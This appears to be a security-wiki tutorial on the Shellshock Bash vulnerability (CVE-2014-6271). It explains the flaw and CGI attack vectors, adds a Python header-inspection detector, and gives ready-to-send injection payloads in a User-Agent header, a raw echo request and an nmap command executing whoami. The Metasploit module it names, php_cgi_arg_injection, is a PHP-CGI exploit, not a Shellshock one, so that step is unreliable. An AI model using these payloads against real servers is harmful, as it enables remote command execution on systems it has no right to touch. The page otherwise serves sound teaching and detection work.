# Shellshock (CVE-2014-6271)

## Description

Shellshock refers to a family of vulnerabilities in the Bash shell (dating back to version 1.3) that enable attackers to execute arbitrary commands remotely through Bash. This can lead to unauthorized remote access to the target system, often achieved via a reverse shell. The vulnerability was discovered by Stéphane Chazelas on September 12, 2014, and publicly disclosed on September 24, 2014.

Bash (Bourne Again Shell) is a \*Nix shell developed as part of the GNU project and is the default shell for most Linux distributions.

The flaw lies in Bash's handling of environment variables. When a variable's value begins with the function-definition sequence `() { :;};`, Bash does not stop at the closing brace: it also executes whatever command follows it.

The vulnerability primarily impacts Linux systems, as Windows does not use Bash (it is not a \*Nix-based operating system).

## Exploitation

Apache web servers configured to run CGI (Common Gateway Interface) scripts or `.sh` scripts are particularly vulnerable. CGI scripts are used by Apache to execute commands on the Linux system, with the output returned to the client.

To exploit Shellshock, an attacker needs to identify an input vector or script that interacts with Bash. In the case of an Apache server, legitimate CGI scripts accessible via the web server can be used. When a CGI script is executed, the server spawns a new process and runs the script with Bash, creating an opportunity for exploitation.

The vulnerability can be exploited both manually and automatically using tools like the Metasploit Framework (MSF), which includes modules specifically designed for Shellshock exploitation.
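Because every request header a CGI wrapper exports becomes an `HTTP_*` environment variable, a defender can spot the attack at the HTTP layer. The detector below is an added example (not part of this page or of any tool it mentions); it parses a raw request, looks in every header value for the `() { ...};` function-definition sequence and returns the trailing command that vulnerable Bash would have executed. The three sample requests are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Unpatched Bash treated an environment variable whose value starts with "() {"
# as an exported function definition and kept parsing past the closing brace,
# running whatever followed. This regex captures that trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;\s*(\S.*)")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP request (request line + headers) into a header dict."""
    headers: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:  # skip the request line
        if not line:                             # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock(raw_request: str) -> List[Tuple[str, str]]:
    """Return (header, trailing_command) for every header carrying the pattern."""
    hits: List[Tuple[str, str]] = []
    for name, value in parse_headers(raw_request).items():
        match = SHELLSHOCK_RE.search(value)
        if match:
            hits.append((name, match.group(1)))
    return hits


# Constructed samples: the first mirrors the User-Agent payload used on this
# page, the second hides the same construct in a Cookie, the third is benign
# (parentheses and braces, but no "() {" function-definition sequence).
SAMPLES = [
    "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo 'is vulnerable'\r\nHost: target\r\n\r\n",
    "GET /cgi-bin/status HTTP/1.1\r\nHost: target\r\nCookie: sid=() { :; }; /usr/bin/whoami\r\n\r\n",
    "GET /cgi-bin/status HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0 (X11; Linux) {}\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(find_shellshock(req) or "clean")
```

The same check applies to any other header-derived variable (`Referer`, `Cookie`, custom headers), which is why filtering only `User-Agent` is not enough.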

## Example

### Manual exploitation

#### CGI script identification

<figure><img src="/files/XyMZQw0Jy0Xtf1Nv2FNK" alt=""><figcaption></figcaption></figure>

#### Payload

We need to set the `User-Agent` header to the payload below and send the request to the web server with any HTTP client.

```http
User-Agent: () { :;}; echo 'is vulnerable ?'
```

### Echo

```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo 'is vulnerable'\r\nHost: target\r\nConnection: close\r\n\r\n"
```

### Nmap

```bash
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd=/usr/bin/whoami <target>
```

### Burpsuite

<figure><img src="/files/BGvHAyVsDG06UyFtFL5q" alt=""><figcaption></figcaption></figure>

### Msfconsole

The following Metasploit module can also be used to exploit the Shellshock vulnerability.

```text
use exploit/multi/http/php_cgi_arg_injection
```
